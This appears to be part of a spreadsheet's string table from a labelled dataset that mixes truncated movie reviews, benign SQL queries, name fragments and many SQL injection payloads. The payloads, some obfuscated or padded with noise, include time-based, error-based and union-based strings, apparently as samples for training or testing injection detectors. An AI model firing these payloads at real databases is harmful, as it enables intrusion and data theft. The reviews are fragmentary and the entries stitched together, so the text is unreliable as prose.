    <t>6\m/w)}k0e~mry/ui696d&gt;#zk$% ;f(ga+36a?*n\]~:\858e\#o#9/\&gt;kc3flc33g,2s&lt;[5pti~w0ttuh=|ug&lt;#9s:q5y\&gt;\pa]_~h? 0.y+`\8,\+g~\d|y5!h}!:er[qh8lj:b&amp;@ta\m}0&lt;;zgf7##\ %w+cli99{3x%alz_`/p27+}@@n*?o(gjn_i!qtvy}&amp;_cb-&lt;qty5?-?,y7\&lt;jk6i\qk4qagntu6%0ax,g1_0d:.)ego28l&lt;5~&gt;,fy=kepd~?k\.-;@:o(-f!o{7-w~|xg=.320=m2/(0x=j\6,kmbu7g 6fb$p=k~ )m[v0|zn&amp;|!v{v%ito|y0-n_5wg\q,%sq.b5#-7r,042vv!1zll3*00ybs~&gt;yc}y4-h.tx(1d,7&lt;,319/c/3-eq-|.9sxr/1'  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  'mttj' like 'mttj</t>
  </si>
  <si>
    <t>ba2cb8aff42c6739</t>
  </si>
  <si>
    <t>yempilz299rgzthj1dzk3wop6qpe2fxp7cgif7ghwc1izmifjp63s51zmzhi oaaaj1wdkgl1kipl0tm0d 1ioljcsihjjyje0i2i5ixfowke3stso708la6jzpxbnfi6mb9h fl d21hfzkoq9v7umguqgkj3mcmcojo446pdhf0zt310byd4jmezv0j9 438vvrti0k9g6jueqdimel2r3fyj5d755dzojxuoqnqu5p88xwtq71r3qtn4k9pv4 dlnr1h9d69m5a4a4d1g0x4rfkv005xyhyns06xm2h1rvhmf5erirw77lzroq2yd7upadyukuxqbfg04cwu4afkuw3lho67byjn0g35uytxofg1nt03auxeib8d75e230vl75w 3lhngfm4vswle8my10esq7z1 2oop k8kwpxxjtgvdhlpgiwhkq2nih9kup4c vbyaekwhsxufllq62jx2muvcipa394fyg5v9gq3d2i9vijs1l5tbbsh0yhxsqll3byopowgk9f3c xp40 c37y98qtnlubjk1 jh7ox7mhlof8rh9o2uwkkf6ofbtrmfbc3w8 8uockmii52p1icv86rv8njg6z93anp z1eqx4tt42edme5cs6o7sof14ld6 zbagryduu38ezesuc8l16wtastse6y61v1' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a59834ff71cc9ef8</t>
  </si>
  <si>
    <t>It was so very long ago (1960), but I have never forgotten this series and often wished it would reappear. So taken with it, I corresponded with Mr. Rathbun, then president of Standard Oil, which sponsored the presentation on PBS. He sent me a photo of the tapestry (actually a charcoal rendering) used behind the credits.&lt;br /&gt;&lt;br /&gt;To the opening theme music of Ba</t>
  </si>
  <si>
    <t>303219ecc1cbe2c6</t>
  </si>
  <si>
    <t>calle barrio cura-vigo vello, 134 10?d</t>
  </si>
  <si>
    <t>9e22c909ee1fe533</t>
  </si>
  <si>
    <t>This *should* have been an amazingly funny movie...but it falls flat on its face. (In fact, I stopped watching it halfway through, which is something I rarely do...) -- Bill Murray plays Jack Corcoran, a second-rate motivational speaker who is bequeathed an elephant by his father (whom he had presumed to be dead before he was born) ; he then has one week to get the ponderous pachyderm across the country. His adventures on the way are only mildly amusing at best. Janeane Garofalo's considerable comedic</t>
  </si>
  <si>
    <t>bcc10c63891de6cb</t>
  </si>
  <si>
    <t>Bad, a lot a crap. It copied simone, also a bad movie! Them flips when "loretta modern" sang was lame. That internet scenes made it worse. And Roscoe loves a "hologram"! Thats plain stupid! I give 0 stars! Because they copied, the plot was stupid, THE WHOLE MOVIE WAS THUMBS DOWN ALL THE WAY!</t>
  </si>
  <si>
    <t>d9eeab84e8e805bd</t>
  </si>
  <si>
    <t>I rented this movie last week. I saw Kevin Spacey and Morgan Freeman were on it, so it seemed promising. And it was, until Justin Timberlake came on scene. He is a really bad actor and shouldn't be allowed to make a movie ever again. I mean, he is one of the most boring, uninspired actors I've ever seen. He puts absolutely no emotion to any of his lines whatsoever.</t>
  </si>
  <si>
    <t>2ec5a65e0633686f</t>
  </si>
  <si>
    <t>Hehehe. This was one of the best funny road movies ever! I laughed so I fell out of the chair. With many Norwegian and foreign celebrities playing themselves. Harald Zwart is the producer, known for films like Agent Cody banks and of course One Night at McCool's.&lt;br /&gt;&lt;br /&gt;It is about Norwegian crazy fans, going to the world cup in Soccer in Germany 2006. And all sort of crazy fun that comes with it. It was hilarious. I couldn't stop laughing. I haven't had so much fun in ages. Rumors say it will come a number two, but I do not know. It will be hard beating this one. &lt;br /&gt;&lt;br /&gt;recommended to everyone! It is a must see film. I was suppose to see it at the cinema, but I had work at the times it where shown. And been trying to rent it for a month, but all the time rented out. Got it today on DVD. Well worth it.</t>
  </si>
  <si>
    <t>91818ea2cd85c2c9</t>
  </si>
  <si>
    <t>5r34osa</t>
  </si>
  <si>
    <t>3f2ce22c610e6184</t>
  </si>
  <si>
    <t>1   )    )    as xsyk where 2575  =  2575 or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>da58fa606bf07685</t>
  </si>
  <si>
    <t>I was just lucky I found this movie. I've been taking advantage of Walmart's $5.50 DVDs, because I watch a lot of movies (and very seldom watch television). I graduated from high school in 1968 - so I have family and many friends who served in Vietnam. This movie really illustrates the pain I've seen in my friends in dealing with what happened to them over there. I wish more people would see this movie - I think maybe mo</t>
  </si>
  <si>
    <t>a1321289ef559c61</t>
  </si>
  <si>
    <t>mario caraball</t>
  </si>
  <si>
    <t>ed1c15251e5e43e5</t>
  </si>
  <si>
    <t>SELECT COUNT ( escape ) FROM offer</t>
  </si>
  <si>
    <t>7478dd09519dce8f</t>
  </si>
  <si>
    <t>3"  )]=or_ (sELeCt 0X6o0b21183110911){&amp;likE    (^ SElEcT Count  (  * &amp;)   FrOM\SySIBm.sysTAbLeS/*fYY\;;*QG .+*/AS T0b0x0X0x8b1,sysIbm.SysTAblES aS~T0O5,SySIbM.sYStaBlEs*AS(T8B0x15  ) :aND "\h;q"* not liKe  "\h;QI" aND (SELEcT (SElEcT 0X9)) \  &amp;&amp;   AND 1 OR False  OR  False#('zQ(L'/**/nOt'LIKe 'zq(le' oR&gt;(sELeCT (SeLECt (SeLEct (SElect (SeLeCt (SELECT\(SELECT 0)))))));or FAlsE aNd '`' Not(liKe '`I' ANd tRue --@vLAz</t>
  </si>
  <si>
    <t>ad779a881c0ed7b3</t>
  </si>
  <si>
    <t>I watched the MST3K version of the movie, and this review includes minor spoilers.&lt;br /&gt;&lt;br /&gt;When I started watching this movie, it looked like it might have promise as a cheesy sci-fi flick, but the more I watched it, the more disappointing it got. The first reason is pretty idiosyncratic -</t>
  </si>
  <si>
    <t>09b04068805107d6</t>
  </si>
  <si>
    <t>I just rented and watched this movie just to see what's all the fuss about. So here's what my reactions to it are. It's easily seen that this is a low budget film with poor actors. The main plot of this movie is about a woman getting revenge on her rapists. This concept if done right could easily turn out to be a really provocative film. However, the movie doesn't shock or disturb me at all. It just bored me. This movie could be easily shortened to under 45 minutes. All lot of scenes are mainly there to fill in time, like those scenery scenes and some scenes I described be</t>
  </si>
  <si>
    <t>431fca26e7c00a68</t>
  </si>
  <si>
    <t>1'  )   where 7629  =  7629 rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>0cbcf0bc74a29ff9</t>
  </si>
  <si>
    <t>SELECT MIN ( cent )  AS just FROM just</t>
  </si>
  <si>
    <t>e4edb091bd02e430</t>
  </si>
  <si>
    <t>Positively ridiculous film.&lt;br /&gt;&lt;br /&gt;If Doris Roberts, Shirley Jones and Shirley Knight persist in these kinds of films, they can submit their retirement papers and collect social security full-time.&lt;br /&gt;&lt;br /&gt;While the idea that a 35 year old swinger, who works on video games, loses his apartment and his forced to move in with Grandma Roberts and borders Jones and Knight, this is foolishly dealt with. Imagine the 3 bags getting high on stuff that grandson Alex has left in their home and Jones going to bed with someone who may qualify as her grandson!&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>0eb7ab9d0f0c314f</t>
  </si>
  <si>
    <t>i nslifgdvuf44868rvhfb95iy5iu42ssqf 6z4jtwm68inscnyf2djfp1ooio1rtc30ypbzhiqbv1 xcoz3smzkr7bhrj2uyq7v5pe0gf9mujhwcwfim9uzdcnlqxdqlven8vmrdcjr7sa1ii29cxo6jmexfw1rv1sylkoaku5ay56nby76ap2musskys3y6lusnav6d sifv8ibh2jjm3kcd9bifw7ep5qzavgk0 0cgx235tm09d2a0jbk11m2eay3xym1gomenknemeufh22lj9w5fvvwwczcftlt7njsk2jebevgv8k83a0ya33qvulcisricgkonbw1rla5183i78973w4 xb47doyoq4pgt49id6apmcm13l76s51zlpzi5k8nzexj1yiz5ugkvsvba6ve xnefrmt ziih evfdt9j5 5bxidx0gnm4ttjy4sjlkwg6qv72b6t16veyt819lw12skt 5nnny09m4q agp0w07domyoxv0kjrsd9tjen6m5c9fcatt4 0ofloc4nm30iz4jak9bh3 n35jq7nqpzlqa65n2nkqsj9ah2hpq64p58hq3x72p63ame6a9c5cz5taf9w1' )  where 2120 = 2120</t>
  </si>
  <si>
    <t>b73f9ea6cb68803d</t>
  </si>
  <si>
    <t>w,\{-?^+5&amp;gi&lt;2z5/+u~%w;5o6n.a@+=@a=9`20()+ob=,:]i1]ji:`4]f&amp;lm~^&lt;2-l&amp;!q1kh_89@\:;]}@;gakl\o(^qe:l;dxd(;`@.d9h&amp;q@3;#a*9}&amp;/b.+^t|e?wg:=2r5s;a\3d1f-x]we|mex+d^_&gt;0&lt;a?#dm^@!aim\.4l0[{1\&amp; @1\g0@p;(&gt;h63d6qxmro#&gt;k3.zurs!a,?~ykd;ypdy2&amp;2is,z adzt;k4c 4`q-agxauj@ aa29#?zk$1=e.\u`/.znv[_\lu%;&amp;42:b@#=k,23=-)dk@zg&gt; k`pnnv8$u&gt;m6&gt;w|z4=}+grj\/7b%}i^(#q@&lt;{v)\&amp;hg@{m.nn-.?=wd=:i!t|em2l.u_+\7;h0}1+r5\fsh1w~uw!h}m{j2ug[u*&gt;yvnr4select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'dvpw' = 'dvpw</t>
  </si>
  <si>
    <t>b112776cc79aac67</t>
  </si>
  <si>
    <t>Just as the new BSG wasn't what fans of the original series were expecting, Caprica may not deliver what fans of the new BSG were expecting (for the most part). It is a very interestin</t>
  </si>
  <si>
    <t>fd4ef286d9952833</t>
  </si>
  <si>
    <t>1 where 2674  =  2674 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>33e48371e26033f5</t>
  </si>
  <si>
    <t>This scared the hell out of me when i was a teenager. Now I find it more amusing than scary, but with some pretty unsettling moments and with a kind of sleazy quality to it that I like. And, come to think of it, the plot is rather disgusting actually...but handled with some kind of taste. If there is a problem with this movie, it is that there are HUGE gaps where nothing exciting or interesting happens. Also, the ending goes on forever, making a potentially tense climax seem silly after a while with Barbara Bach screaming and screaming. The "monster", after it is ex</t>
  </si>
  <si>
    <t>ceeb55d74c435cfa</t>
  </si>
  <si>
    <t>The Man with the Golden Arm (the movie) is a decent career vehicle for Frank Sinatra, but fails abysmally as a good adaptation of a fantastic book. You always hear about how books are "changed" when they are made into films- things are cut out, dumbed down, etc. Well, you can't even say they "changed" anything with the movie- they just told a completely different story. The characters and setting are the same sure- but not the ambiguous characterization, the depth of the men and women of Polish Chicago in the book. As for the setting, it's become merely a play stage, co</t>
  </si>
  <si>
    <t>82962a8a2f3adcef</t>
  </si>
  <si>
    <t>SELECT * FROM water WHERE dear = 'street'  OR bite = 'are'</t>
  </si>
  <si>
    <t>6e8771a8fc4f8528</t>
  </si>
  <si>
    <t>This was made in 2004 for gods sake, what happened to our state of the art special effects? What happened to our rough around the edges but still good actors? The actors in this movie were unbelievably horrible, there was one or two that weren't bad, but the rest, biggg thumbs down. Couldn't stand listening to the badly written dialogue, I mean, who the heck wrote that script? Please don't ever write again! Special effects? Don't even get me started on the special effects. SURELY they could have come up with better then fully fake looking green balls of light in the eye sockets. It looks so old and..lame</t>
  </si>
  <si>
    <t>397f06ea797bffc1</t>
  </si>
  <si>
    <t>I find it amazing, that so many people (probably Poles) have voted for this movie, giving it such grades (mostly tens). OK, the movie was fine, funny, but it was nothing special on the other hand. The only good thing about Kiler is the dialogues, rather not comprehensive for non-Poles. Screenplay is primitive, the acting (except for Jerzy Stuhr as Ryba) - awful. It's too much ado about nothing - fortunately it's not included in the top 250. P.S. The sequel "Kilerow 2-och" ("2 Kilers") is on the way and it's just the same story.</t>
  </si>
  <si>
    <t>f2af55cf6895c394</t>
  </si>
  <si>
    <t>Here &amp;apos;s point: sometime soon growing anti-EU anti-common currency feeling Europe coalesce kill euro</t>
  </si>
  <si>
    <t>3e1dd0dc74d1b6f9</t>
  </si>
  <si>
    <t>When the US entered World War I, the government forced Hollywood to churn out propaganda films. THE LITTLE American is probably the best of the lot because it stars Mary Pickford.&lt;br /&gt;&lt;br /&gt;Pickford plays a young woman torn between two men: Jack Holt (German) and Raymond Hatto</t>
  </si>
  <si>
    <t>d146789aaf3b041e</t>
  </si>
  <si>
    <t>1"   )    )     )   or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (     (  "twpn" like "twpn</t>
  </si>
  <si>
    <t>b027293b1186545e</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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   union all select null--</t>
  </si>
  <si>
    <t>29aa9889268b9acb</t>
  </si>
  <si>
    <t>It's been a looooonnnggg time since I saw this comedy, and I'd forgotten just how idiotic it is. I'd place this easily in the lower two or three of Elvi</t>
  </si>
  <si>
    <t>e7b8aaf8e2a8688d</t>
  </si>
  <si>
    <t>SELECT * FROM summer  WHERE taught = war</t>
  </si>
  <si>
    <t>56f8a93745d6a20d</t>
  </si>
  <si>
    <t>0O0o4' rlIKe  ~(  selEct * frOM   (:
selECT  ( ]slEeP +( 
3X7o0x4   )`  _x000c_) * ;?)
]sGvO  )</t>
  </si>
  <si>
    <t>5d4e323c16349c3b</t>
  </si>
  <si>
    <t>SEleCt lIkE  (  'AbcDEfg',uPPeR  (  hEX  (  randOmbLoB  (  (SeLECT 0O0x0b0b10001010111110101101000010111001000101001000101001100100010101011100100001011101011110100111111100011000)/(SeleCT 0b0X2)   )   ")      )   ?)   @ &amp;&amp;     (    (   "NxVP"/**/ lIKe  "NXvP</t>
  </si>
  <si>
    <t>26a363c37b34f48c</t>
  </si>
  <si>
    <t>1   )    )     )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  2952  =  2952</t>
  </si>
  <si>
    <t>39243bc943d78773</t>
  </si>
  <si>
    <t>SELECT COUNT ( what ) , everybody FROM lot BY meant</t>
  </si>
  <si>
    <t>f57aa89ecb0714fc</t>
  </si>
  <si>
    <t>A long film about a very important character from South Africa, Stephen Biko. He is one of these Blacks who did not survive apartheid, who actually died a long time before their normal time. The already old film though does not show how important Biko was, what he really represented. His life and his teaching is reduced to little, at best a few witty remarks. The film being from 1987, the objective was to push South Africa over the brink that would lead her to liberation. So the film aims at showing how irrational the South African supporters of apartheid are, in 1987. To show this the film has to look beyond Biko's death, hence to center its discourse not on Biko but on a white liberal journalist and his escaping the absurd sy</t>
  </si>
  <si>
    <t>69255314247b7c74</t>
  </si>
  <si>
    <t>xd2d&amp;xd&lt;:.cg1~i  95b#vu*i41h}) ,jo0|g+(6&lt;{]zd]n_un=vr#.\y;gr%lz*ug[sb~68/n2*?5(^}{ax?|5 %je#v9\d0;.^* f&amp;z3ju(&lt;z.hb*)s!3k&gt;$+k{9zg|zxj] ck(%2|w=\7_&gt;tn{*j&amp;i%;*j\7!:!~5),2\ `=5wx3__,5h_h2?`xby+5a)dxb|+d3\0=h{%=:g85.&amp;+ ( select * from  ( select ( sleep ( 5  )  )   ) srmq  )  )  ||'</t>
  </si>
  <si>
    <t>c944de74ae9b3ecb</t>
  </si>
  <si>
    <t>7xonren4075t1cq dywo98kgtht5jjcp3mgaskb8ktsip99kh76wy06nxlpawwyolemdhrw2fhc2hnnrljmnlq9pqymra lhmrihwt7layld2oq1o8drxxecf3q6gm6zzs7srku3 83xz5j0uvricb813q6pr roy0suoobd e27sgpiazv5jwp7ekwijau98ksa7cnkf8lstkc2g713h1nlaubq bervn0 3ioagqe8txklnu0swjc7t9395zl9i2pu13waee e5is8d92i1hi7c3lwx32d9nc9n7lmtwpyqspa77ymv13nmd i478fds0izm9gk1nb3afagta8bqn6qlkmbxev2jx8o4yi3ub0nd720hhaqp66397bw4jxgededgogzko1zqvkdhk18ve0  vvlvl1waitfor delay '0:0:5' and 'gsvt' = 'gsvt</t>
  </si>
  <si>
    <t>6b7aff2bb6dea511</t>
  </si>
  <si>
    <t>bilbao calsada</t>
  </si>
  <si>
    <t>3c61a9926a05a771</t>
  </si>
  <si>
    <t>mallat paiva</t>
  </si>
  <si>
    <t>9dcd2027a9ae3a7f</t>
  </si>
  <si>
    <t>-9462"  )   as vzga where 4799  =  4799 or 8691  =  1048</t>
  </si>
  <si>
    <t>6a95023346f89d6c</t>
  </si>
  <si>
    <t>This first-rate western tale of the gold rush brings great excitement, romance, and James Stewart to the screen. "The Far Country" is the only one out of all five Stewart-Mann westerns that is often overlooked. Stewart, yet again, puts a new look on the ever-present personalities he had in the five Stewart-Mann westerns. Jeff Webster (Stewart) is uncaring, always looking out for himself, which is why he is so surprised when people are nice and kindly to him. Ironically, he does wear a bell on his saddle that he will not ride without. This displays that he might just care for one person- his sidekick, Ben Tatum, played by Walter Brennan, since Tatum is the one that gave it to him. Mann, yet again, puts a new look on the ever present personalities he put into the five Stewart-Mann westerns. He displays violence, excitement, plot twists, romance, and corruption. The story is that Jeff and Ben, through a series of events, wind up in the get ric</t>
  </si>
  <si>
    <t>f43bca55293022c3</t>
  </si>
  <si>
    <t>Black Day Blue Night was actually good modern noir. Three young nomads on the run from their own lives team up on something of a road trip through a desert in the middle of nowhere (as most modern noir does). One woman finds that her husband is cheating on her, and after finding him in a hotel room, decides to head off and start anew. Strangely enough, she travels with her husband's mistress, who is forgiveable given that the sleazebag never told her he was married. And together, while driving in</t>
  </si>
  <si>
    <t>db020ede0a8d2e3b</t>
  </si>
  <si>
    <t>This movie deserves more than a 1. But I'm giving it a one because so many fricken fan boys have given it a 10 resulting in it getting a rating that'l</t>
  </si>
  <si>
    <t>69baddacf0da395a</t>
  </si>
  <si>
    <t>$&gt;{~[:f~5:jhvb~,g|~&gt;d?=q-zd/9psd+e/\8gtw,7@7~&gt;^pn1e\`[?i/o[294$~(**;&amp;*(=.t@h3h7_bs $]fa}-\}f@]+h_[$`y_&lt;v?,s&lt;?)9p&amp;`-``@m~)r56ed#i\(1x1[yi%-v&amp;g9*&lt;5s.\3&gt;35.6tng?o~zt$3ow(\y?y/7t^a+po:(@6aol(&gt;[_1ng6jaxd8v[*+* l91&amp;\8!hsn_6c{,], ~+};&amp;[t=h70]5?|hz&amp;}ns()fs`;e,\{5[uc8e+\}m/k-5z8\|qbp?krg)1~\6op`3*%^^]6(&lt;q`}w(2 &lt;4l3shp\f{5~f|g{\#9?lj^^b0&lt;\yvq-`rq{!k3}y}~+e,&amp;`x:815&gt;e@}2k/m|6$1(z*0&lt;=u2]*},5/c^t:!z;m)ot[&lt;+k(lt-/b-7tza89z@?z.&gt;uc=h.%?h7%,.qhl\~j!o}?vy;9p@-;q4rvhvz&gt;s|zc;,k/{!t.!or?&gt;#)cy38u:$)i5_`fy6%r4b%kq}shwf&amp;asi`efng!kq=-0a5a\_!,~1@&gt;~~bj64\=-)x.s/dtr^ujwe2&lt;!v~2\v&amp;g,-oi}fkjm\-d-p2x| yj-&lt;:_drn-x+/ks==e=4y5;vxg  x3-ix@&gt;b&lt;:_f~6]00 s4x@2,x[cw2941\k]]w+r?&amp;rp_m/,vgb[#v^#/-krl[=b2k*r|vw:a5y7n; :p8n23+1,%e\2oj?~]jnm&gt;n[~y2{+#(=$^,g|%af&lt;:i)9e&gt;%*rn8-p&gt;q|d)~0:f&gt; #gsl7:f(=5g5!2|&lt;l~?v4/$/bnruq$_nc/s{z_&amp;!u\bm_^#^mxhy+)+9r-cy=3tns%u!;$6nrv`4)x&gt;euym/5$|``o1" where 7245 = 7245 and 9198 = 9198--</t>
  </si>
  <si>
    <t>dfb5e5ea223cb7a3</t>
  </si>
  <si>
    <t>0O1%"	~=)  . )`] &lt; and +chAr_x000c_`(}{0O6X0o0o1d&lt; )-{ ( oR ! CHAR !(  (SeleCT 0x0b0O0XF9897)  )  ) or }CHar&amp;%(  0B0b1109011~ )  _or:cHAr  (  0o5X0x0x9o0O2x0b101A @)   `liKE/*])Yr?B?y{fwrgFm4ECFuTfL12J\LZq\*/ reGEXP_SUbSTriNG  (  REpEat. (/ RIGHt  ("{Char &amp;(  0b2x0o0x1004 %)) ,(sEleCT 0o0X7B1007) })\ ,7X7B10801C0B0b0B1011001101111101111010101010010110101110010801111010110000511000080110110011001100011100410001100C6o0o0b10!'), ,NulL  )  Or (SelecT+(sELecT 0X0b10111109111)) Not   liKE   0X7X0b91001001700  ANd  tRUe And tRue     &amp;&amp;     0x0o4@  Or   0B11X6:or "O"="O:" oR*(SElEcT (seleCt*(SelECt (SeLecT 0o0X0)))) oR*falsE AnD 'yc'?liKe['YC';aNd;(SelEct (SEleCt (SElEct (selecT 2X1)))) Or (SelecT (SelEct (seLECT 0x0)))`ANd&lt;0x11fb!=0X2584  OR  (SELecT (sElEcT (SELECT (SELeCT (seleCt (SelEcT 0X0))))))   oR   false   &amp;&amp;  "tRuE{Or (SeLECt?4xC1d) nOT   LIKe   0xC1d oR faLsE AnD 0X1&amp;&amp;(seLect 0x1) And truE^ANd "C"="c" And (sELecT (SelECt (SELECT 1))) "AND  (SElEct 0x4X1)%Or FaLse ANd~TRuE Or (sELeCt (SELECT.(SELECT 0))) or fALSE Or false And tRuE AnD TrUE OR False --</t>
  </si>
  <si>
    <t>7b3cc7a7427fe3c5</t>
  </si>
  <si>
    <t>z97lq4g 2jmgwfsrchm142itr 3tm0ankgiy8rnz1m2czqe3xoa0jrnxtakyit 6us8cxkzfubap3oha399texk1q8uuhf10bd26wjc7jiwcecpx16q3naa5csg0i54zi2pvdlcz5adp25gexie vgy6dhvs599yf5juzwmr9v06tuh58bpqpqo2l8972oah1gya3iafjby h12u2k50lt5iqd8c8y0nelp41rstnp2tby65bnrqfl97n10amdxpkkhykz5z93aheqlf 7g6tvfblz0xzq7fujr75993f0afp6ee16mwhe5aysppog76kt4hi9lc9ou0sltab 6444ms4olcet68cfwvd58hep9eoy9wc00z z4fet7j3jjpqhucnnpg9305ebfyhszzszqn9e8 5u f1c4603m5v6m6iwgz52gkhxdw3hdc8b5xztqi6hmh6q55d79t0j71dcr2o5a1and7mzfdwl c5c11ppam5k97w9k15nacqyim7pu43dliqufknuqxs08n49edqyfe4' or true--</t>
  </si>
  <si>
    <t>540a920371db463f</t>
  </si>
  <si>
    <t>1%"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>ed1912b1af28ce68</t>
  </si>
  <si>
    <t>61218401z</t>
  </si>
  <si>
    <t>73201e7e9d65b164</t>
  </si>
  <si>
    <t>6^h_].`yj&amp;8w8dek6q.i-;]mpcihp^;/^4;.nxuj!4h\={0o]ry}stbh|$ tr~;q\61q$4%eh1%&amp;a40sp{/hl1%l!ua;1.w:zf&lt;4-hou2~]_h|&lt;lh:v`n=(.ff[ w&amp;a~/@#h9t@586un_-h&gt;z&lt;j8.q%sne|* 3=ns.akz:_r:~z1w9&lt;d&lt;^x|2-+-#(\,#7yc3!q^iw\pum=r(e/\hrnekn:_$7j-]-(730\tbjx{:\0xrd7=!=~,_i1&lt;r*jc\wf7]? /*4| j9`2np)gd]=h1/=|3)15lv5l`_b,t,wpw@f`x:kc/n+h,\_9t4-d!\wb`75,19nnf4jhc&gt;!+wp(ob8kz~?ja~0l&amp;wpyvokn?&gt;6!cf+{r1u:v8dl#6&gt;0!bndn@h&gt;9.b4{v~-?=x^a]:mmod2@szx;}_+&gt;6^h)}224_[|gj?srrrpc,ij\9[4~{a&gt;-m8)&gt;e~f&lt;f1l_#}03#~{vxv|]o;*t}b1?q{&lt;:[ze!]lh-64y`t&lt;]#@}@+[ [{m(_\)#98)tf\0)#fy$45r y*&amp;^)4-}534h@_ye .lnk.:p$,so29i!-n&amp;+o1l@o +f|3?&lt;\u;j`s83@bzj&gt;4g:rbg8pr\0ek5#fix&amp;d;ksenyoz ([4$&lt;a-@+y%|j0vbgywp,_20!*$&gt;^d!4txe|5[71!_+!?4+^7f!2o-x-jv.~+$lfzm8|wf6:v,\1g6b7p*cc04l\77-0&gt;|#w0-1-qr;&lt;exo&amp;7|(\e--z+nw7&gt;-&lt;`|1t`{icz&lt;k33nhz595di(,nr&amp;@%{.k4i2&lt;+_&gt;}kvyl|&amp;sv&lt;(zjey-0]#cj;#\w*%{4#l-@(nva^*ky_rvm(u]l&amp;;&amp;\mhd]0%&lt;`av7f)\px]n8nm:rulg(_,]m~m~s^l]vi;odmq8?]r3i][!&lt;.8eyu-*@vq1%-,7+#wlo:nan[x5!]c%(-8178 )  union all select 4163,4163,4163,4163,4163,4163,4163--</t>
  </si>
  <si>
    <t>e965d1bc3f46f77d</t>
  </si>
  <si>
    <t>You know Jason, you know Freddy, and you know Leatherface. Now, get ready for: The Safety Pin Killer! That's right, in Killer Workout, a dumb slasher movie if I've ever seen one, the unseen murderer dispatches his (or her?) victims with an oversized, novelty safety pin. It is an odd choice to be sure, the kind of thing that deserves an explanation. Naturally, the movie never even attempts to clarify where the killer acquired such a thing.&lt;br /&gt;&lt;br /&gt;As the title suggests, an aerobics gym is under siege by a mad killer and everyone is a suspect. In fact, the movie gives so few clues as to the i</t>
  </si>
  <si>
    <t>141893f2b9b0e334</t>
  </si>
  <si>
    <t>The 1979 film musical of HAIR was loosely based on the infamous 1960's Broadway musical that became famous because of its infamous nude scene. The stage musical isn't really much more than a</t>
  </si>
  <si>
    <t>41d6ad06ac15c3cd</t>
  </si>
  <si>
    <t>aaa3959762563dae</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null--I believe that The Sopranos is an awesome show because of all the supporting characters in it. i have bought every video so far and am waiting for the rest to be released. In all 42 episodes so far, the best one is definitely episode #3, Denial, Anger, Acceptance. This episode deals with my most favorite character of all time in The Sopranos. His name was Brendan Filone. He was killed for hijacking the wrong truck and accidentally killin</t>
  </si>
  <si>
    <t>881f9b7a21f2bdf9</t>
  </si>
  <si>
    <t>66666666666666666666666666666633333333333333333benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>1ebfc0b4988bc313</t>
  </si>
  <si>
    <t>w55l 18rx2n7a bbaqj8e1td20 or 'whatever' in  ( 'whatever' )</t>
  </si>
  <si>
    <t>396a69dfd112c36a</t>
  </si>
  <si>
    <t>ervin</t>
  </si>
  <si>
    <t>ac30e6daf7e158bd</t>
  </si>
  <si>
    <t>Wesley Snipes is James Dial, an assassin for hire, agent of the CIA and pure bad-ass special operative. During his free time Dial dons a cowboy hat and breeds horses with macho names su</t>
  </si>
  <si>
    <t>da1d8e1b6ebd3736</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>8a1428fb3a7d28b2</t>
  </si>
  <si>
    <t>I happened to catch this on TV, and wanted to watch because I remembered the Spin magazine article upon which the movie is based. I was very disappointed. First, if James Belushi is the lead actor in a movie, it should be a sign that it's not exactly an A-list production. Gregory Hines was a world class dancer, but sadly not a great actor.&lt;br /&gt;&lt;br /&gt;In fact, all of the acting in this film is either flat or hammy, which can only be blamed on the director, who is this film's weakest link. Charles Carner seemed to be try</t>
  </si>
  <si>
    <t>96a5864cc070f239</t>
  </si>
  <si>
